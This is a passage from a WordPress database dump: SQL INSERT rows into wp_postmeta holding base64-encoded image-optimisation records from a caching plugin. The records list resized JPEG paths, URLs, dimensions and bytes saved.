GciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzNC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTYxMiwidGltZSI6MTQ4MzU1MjU1OSwiaWQiOjE4OTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzNC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzQtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjUzOCwidGltZSI6MTQ4MzU1MjU2MiwiaWQiOjE4OTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzNC00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzQtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg0OCwidGltZSI6MTQ4MzU1MjU2NiwiaWQiOjE4OTV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29042, 1894, 'wpfc_optimisation_reduction', '19669'); 
INSERT INTO `wp_postmeta` VALUES (29043, 1894, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzMC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyNTcwLCJpZCI6IjE4OTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzMC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODcxLCJ0aW1lIjoxNDgzNTUyNTc0LCJpZCI6MTg5NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzAtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI1MjMsInRpbWUiOjE0ODM1NTI1NzcsImlkIjoxODk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzMC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjM3MywidGltZSI6MTQ4MzU1MjU4MSwiaWQiOjE4OTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODMwLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjkzNDksInRpbWUiOjE0ODM1NTI1ODUsImlkIjoxODk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzMC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjA0LCJ0aW1lIjoxNDgzNTUyNTg4LCJpZCI6MTg5NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzMC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNCwidGltZSI6MTQ4MzU1MjU5MiwiaWQiOjE4OTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzMC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODMwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NjgsInRpbWUiOjE0ODM1NTI1OTUsImlkIjoxODk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzMC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTQ4NywidGltZSI6MTQ4MzU1MjU5OCwiaWQiOjE4OTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzMC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU3NSwidGltZSI6MTQ4MzU1MjYwMiwiaWQiOjE4OTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzMC00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODMwLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjgwNSwidGltZSI6MTQ4MzU1MjYwNSwiaWQiOjE4OTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29044, 1893, 'wpfc_optimisation_reduction', '23459'); 
INSERT INTO `wp_postmeta` VALUES (29045, 1893, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyOC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyNjA5LCJpZCI6IjE4OTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyOC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTA0LCJ0aW1lIjoxNDgzNTUyNjEzLCJpZCI6MTg5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyOC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI5MTYsInRpbWUiOjE0ODM1NTI2MTYsImlkIjoxODkzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyOC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjY0MCwidGltZSI6MTQ4MzU1MjYyMCwiaWQiOjE4OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjExOTA3LCJ0aW1lIjoxNDgzNTUyNjIzLCJpZCI6MTg5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyOC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5MSwidGltZSI6MTQ4MzU1MjYyNywiaWQiOjE4OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyOC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzUsInRpbWUiOjE0ODM1NTI2MzAsImlkIjoxODkzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyOC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTkxLCJ0aW1lIjoxNDgzNTUyNjMzLCJpZCI6MTg5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyOC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE4NTAsInRpbWUiOjE0ODM1NTI2MzcsImlkIjoxODkzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyOC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MTksInRpbWUiOjE0ODM1NTI2NDAsImlkIjoxODkzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyOC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo5NjYsInRpbWUiOjE0ODM1NTI2NDMsImlkIjoxODkzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29046, 1892, 'wpfc_optimisation_reduction', '24571'); 
INSERT INTO `wp_postmeta` VALUES (29047, 1892, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTI2NDgsImlkIjoiMTg5MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5ODcsInRpbWUiOjE0ODM1NTI2NTEsImlkIjoxODkyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzEyMCwidGltZSI6MTQ4MzU1MjY1NSwiaWQiOjE4OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyOTEzLCJ0aW1lIjoxNDgzNTUyNjU4LCJpZCI6MTg5Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMTYwMHgxMD